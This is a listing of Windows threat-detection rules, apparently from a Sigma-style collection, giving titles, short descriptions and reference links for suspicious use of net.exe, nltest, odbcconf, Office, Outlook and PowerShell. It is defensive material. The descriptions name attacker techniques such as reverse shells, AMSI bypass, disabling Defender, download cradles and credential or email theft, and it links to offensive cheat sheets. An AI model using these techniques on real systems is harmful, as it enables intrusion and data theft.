Detects the usage of the "net.exe" command to start a service using the "start" flag |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md |
New User Created Via Net.EXE |
Identifies the creation of local users via the net.exe command. |
https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md |
New User Created Via Net.EXE With Never Expire Option |
Detects creation of local users via the net.exe command with the option "never expire" |
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Suspicious Manipulation Of Default Accounts Via Net.EXE |
Detects suspicious manipulations of default accounts such as 'administrator' and 'guest', for example enabling or disabling the account or changing its password |
https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html, https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/, https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ |
Windows Admin Share Mount Via Net.EXE |
Detects when an admin share is mounted using net.exe |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Stop Windows Service Via Net.EXE |
Detects the stopping of a Windows service via the "net" utility. |
https://ss64.com/nt/net-service.html |
Password Provided In Command Line Of Net.EXE |
Detects when net.exe is called with a password in the command line |
Internal Research |
Windows Internet Hosted WebDav Share Mount Via Net.EXE |
Detects when an internet-hosted WebDAV share is mounted using the "net.exe" utility |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Windows Share Mount Via Net.EXE |
Detects when a share is mounted using the "net.exe" utility |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
System Network Connections Discovery Via Net.EXE |
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery |
Share And Session Enumeration Using Net.EXE |
Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. |
https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md |
Nltest.EXE Execution |
Detects nltest commands that can be used for information discovery |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm |
Potential Arbitrary Code Execution Via Node.EXE |
Detects the execution of node.exe, which is shipped with multiple software products such as VMware and Adobe, in order to execute arbitrary code, for example to establish a reverse shell as seen in Log4j attacks |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return, https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/, https://nodejs.org/api/cli.html |
Potential Recon Activity Via Nltest.EXE |
Detects nltest commands that can be used for information discovery |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11), https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/, https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html, https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/, https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest |
Node Process Executions |
Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud |
https://twitter.com/mttaggart/status/1511804863293784064 |
Network Reconnaissance Activity |
Detects a set of suspicious network related commands often used in recon stages |
https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ |
Nslookup PowerShell Download Cradle - ProcessCreation |
Detects a suspicious PowerShell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records |
https://twitter.com/Alh4zr3d/status/1566489367232651264 |
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) |
Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots. |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11), https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments |
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) |
Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm |
Driver/DLL Installation Via Odbcconf.EXE |
Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. |
https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
Suspicious Driver/DLL Installation Via Odbcconf.EXE |
Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. |
https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
New DLL Registered Via Odbcconf.EXE |
Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://redcanary.com/blog/raspberry-robin/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html |
Odbcconf.EXE Suspicious DLL Location |
Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html, https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/ |
Potentially Suspicious DLL Registered Via Odbcconf.EXE |
Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension, which is often used as a method to evade defenses. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html |
Response File Execution Via Odbcconf.EXE |
Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
Suspicious Response File Execution Via Odbcconf.EXE |
Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html |
Uncommon Child Process Spawned By Odbcconf.EXE |
Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. |
https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac |
Potential Arbitrary File Download Using Office Application |
Detects potential arbitrary file download using a Microsoft Office application |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/, https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 |
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp |
Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
|
https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922, https://github.com/grayhatkiller/SharpExShell, https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication |
Potentially Suspicious Office Document Executed From Trusted Location |
Detects the execution of an Office application that points to a document located in a trusted location. Attackers often use this to avoid macro security and execute their malicious code. |
Internal Research, https://twitter.com/Max_Mal_/status/1633863678909874176, https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465, https://twitter.com/_JohnHammond/status/1588155401752788994 |
OneNote.EXE Execution of Malicious Embedded Scripts |
Detects the execution of malicious OneNote documents that contain embedded scripts.
When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
|
https://bazaar.abuse.ch/browse/tag/one/ |
Suspicious Microsoft OneNote Child Process |
Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18, https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0 |
Outlook EnableUnsafeClientMailRules Setting Enabled |
Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook to run applications or execute macros |
https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44, https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048 |
Suspicious Execution From Outlook Temporary Folder |
Detects a suspicious program execution in Outlook temp folder |
Internal Research |
Suspicious Outlook Child Process |
Detects a suspicious process spawning from an Outlook process. |
https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100, https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html |
Suspicious Remote Child Process From Outlook |
Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). |
https://github.com/sensepost/ruler, https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49 |
Suspicious Binary In User Directory Spawned From Office Application |
Detects an executable in the user's directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) |
https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign, https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57 |
Potential Arbitrary DLL Load Using Winword |
Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. |
https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py |
Suspicious Microsoft Office Child Process |
Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) |
https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100, https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html, https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml, https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A, https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml, https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html, https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ |
Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution |
Detects execution of Windows Defender "OfflineScannerShell.exe" from a non-standard directory.
The "OfflineScannerShell.exe" binary is vulnerable to DLL side-loading and will load any DLL named "mpclient.dll" from the current working directory.
|
https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/ |
PDQ Deploy Remote Administration Tool Execution |
Detect use of PDQ Deploy remote admin tool |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md, https://www.pdq.com/pdq-deploy/ |
Potentially Suspicious Execution Of PDQDeployRunner |
Detects suspicious execution of "PDQDeployRunner", which is part of the PDQ Deploy service stack responsible for executing commands and packages on remote machines |
https://twitter.com/malmoeb/status/1550483085472432128 |
Perl Inline Command Execution |
Detects execution of perl using the "-e"/"-E" flags. This could be used as a way to launch a reverse shell or execute live Perl code. |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Php Inline Command Execution |
Detects execution of php using the "-r" flag. This could be used as a way to launch a reverse shell or execute live PHP code. |
https://www.php.net/manual/en/features.commandline.php, https://www.revshells.com/, https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet |
Ping Hex IP |
Detects a ping command that uses a hex encoded IP address |
https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna, https://twitter.com/vysecurity/status/977198418354491392 |
PktMon.EXE Execution |
Detects execution of PktMon, a tool that captures network packets. |
https://lolbas-project.github.io/lolbas/Binaries/Pktmon/ |
Suspicious Plink Port Forwarding |
Detects suspicious Plink tunnel port forwarding to a local port |
https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/, https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d |
Potential RDP Tunneling Via Plink |
Execution of plink to perform data exfiltration and tunneling |
https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ |
Suspicious Powercfg Execution To Change Lock Screen Timeout |
Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout |
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options |
AADInternals PowerShell Cmdlets Execution - ProcessCreation |
Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365. |
https://o365blog.com/aadinternals/, https://github.com/Gerenios/AADInternals |
Potential Active Directory Enumeration Using AD Module - ProcCreation |
Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration. |
https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges |
Add Windows Capability Via PowerShell Cmdlet |
Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. |
https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell, https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content |
Potential AMSI Bypass Via .NET Reflection |
Detects requests to set "amsiInitFailed", which can be used to disable AMSI scanning |
https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/, https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ |
Potential AMSI Bypass Using NULL Bits |
Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities |
https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi |
Audio Capture via PowerShell |
Detects audio capture via PowerShell Cmdlet. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md, https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html, https://github.com/frgnca/AudioDeviceCmdlets |
Suspicious Encoded PowerShell Command Line |
Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) |
https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e |
Suspicious PowerShell Encoded Command Patterns |
Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains |
https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ |
Suspicious Obfuscated PowerShell Code |
Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines |
https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/ |
PowerShell Base64 Encoded FromBase64String Cmdlet |
Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line |
Internal Research |
Malicious Base64 Encoded PowerShell Keywords in Command Lines |
Detects base64 encoded strings used in hidden malicious PowerShell command lines |
http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/ |
PowerShell Base64 Encoded IEX Cmdlet |
Detects usage of a base64 encoded "IEX" cmdlet in a process command line |
Internal Research |
PowerShell Base64 Encoded Invoke Keyword |
Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls |
https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ |
Powershell Base64 Encoded MpPreference Cmdlet |
Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV |
https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://twitter.com/AdamTheAnalyst/status/1483497517119590403 |
PowerShell Base64 Encoded Reflective Assembly Load |
Detects base64 encoded .NET reflective loading of Assembly |
https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ |
Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call |
Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" |
https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0 |
Potential Process Execution Proxy Via CL_Invocation.ps1 |
Detects calls to "SyncInvoke", which is part of the "CL_Invocation.ps1" script, to proxy execution using "System.Diagnostics.Process" |
https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424 |
PowerShell Base64 Encoded WMI Classes |
Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. |
https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar |
Assembly Loading Via CL_LoadAssembly.ps1 |
Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load arbitrary assemblies and bypass AppLocker controls. |
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/, https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/ |
Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 |
Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands |
https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ |
Potential PowerShell Obfuscation Via Reversed Commands |
Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers |
https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66 |
ConvertTo-SecureString Cmdlet Usage Via CommandLine |
Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples |
Potential PowerShell Command Line Obfuscation |
Detects the PowerShell command lines with special characters |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64 |
Computer Discovery And Export Via Get-ADComputer Cmdlet |
Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file |
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/, https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf |
New Service Creation Using PowerShell |
Detects the creation of a new service using powershell. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md |
Gzip Archive Decode Via PowerShell |
Detects attempts of decoding encoded Gzip archives via PowerShell. |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
PowerShell Execution With Potential Decryption Capabilities |
Detects PowerShell commands that decrypt an ".LNK" file to drop the next stage of the malware. |
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/ |
Powershell Defender Disable Scan Feature |
Detects requests to disable Microsoft Defender features using PowerShell commands |
https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps, https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE, https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files |
Powershell Defender Exclusion |
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets |
https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://twitter.com/AdamTheAnalyst/status/1483497517119590403 |
Disable Windows Defender AV Security Monitoring |
Detects attackers attempting to disable Windows Defender using Powershell |
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/, https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Windows Firewall Disabled via PowerShell |
Detects attempts to disable the Windows Firewall using PowerShell |
https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html |
Potential PowerShell Downgrade Attack |
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 |
http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/, https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade- |
Disabled IE Security Features |
Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features |
https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ |
Potential COM Objects Download Cradles Usage - Process Creation |
Detects usage of COM objects that can be abused to download files in PowerShell by CLSID |
https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 |
PowerShell Web Download |
Detects suspicious ways to download files or content using PowerShell |
https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd |
Obfuscated PowerShell OneLiner Execution |
Detects the execution of a specific OneLiner to download and execute powershell modules in memory. |
https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38 |
Potential DLL File Download Via PowerShell Invoke-WebRequest |
Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
PowerShell Download and Execution Cradles |
Detects PowerShell download and execution cradles. |
https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd, https://labs.withsecure.com/publications/fin7-target-veeam-servers |
PowerShell Download Pattern |
Detects a Powershell process that contains download commands in its command line string |
https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html, https://lab52.io/blog/winter-vivern-all-summer/, https://hatching.io/blog/powershell-analysis/ |
Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE |
Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe |
https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
DSInternals Suspicious PowerShell Cmdlets |
Detects execution and usage of the DSInternals PowerShell module, which can be used to perform activity that might be considered suspicious, such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
|
https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1 |
Email Exfiltration Via Powershell |
Detects email exfiltration via PowerShell cmdlets |
https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/, https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml |
Potential Suspicious Windows Feature Enabled - ProcCreation |
Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
|
https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system, https://learn.microsoft.com/en-us/windows/wsl/install-on-server |
Suspicious Execution of Powershell with Base64 |
Detects a command line that launches PowerShell with a base64 encoded payload |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets, https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/, https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/ |
Potential Encoded PowerShell Patterns In CommandLine |
Detects specific combinations of encoding methods in PowerShell via the commandline |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 |
Powershell Inline Execution From A File |
Detects inline execution of PowerShell code from a file |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50 |
Certificate Exported Via PowerShell |
Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. |
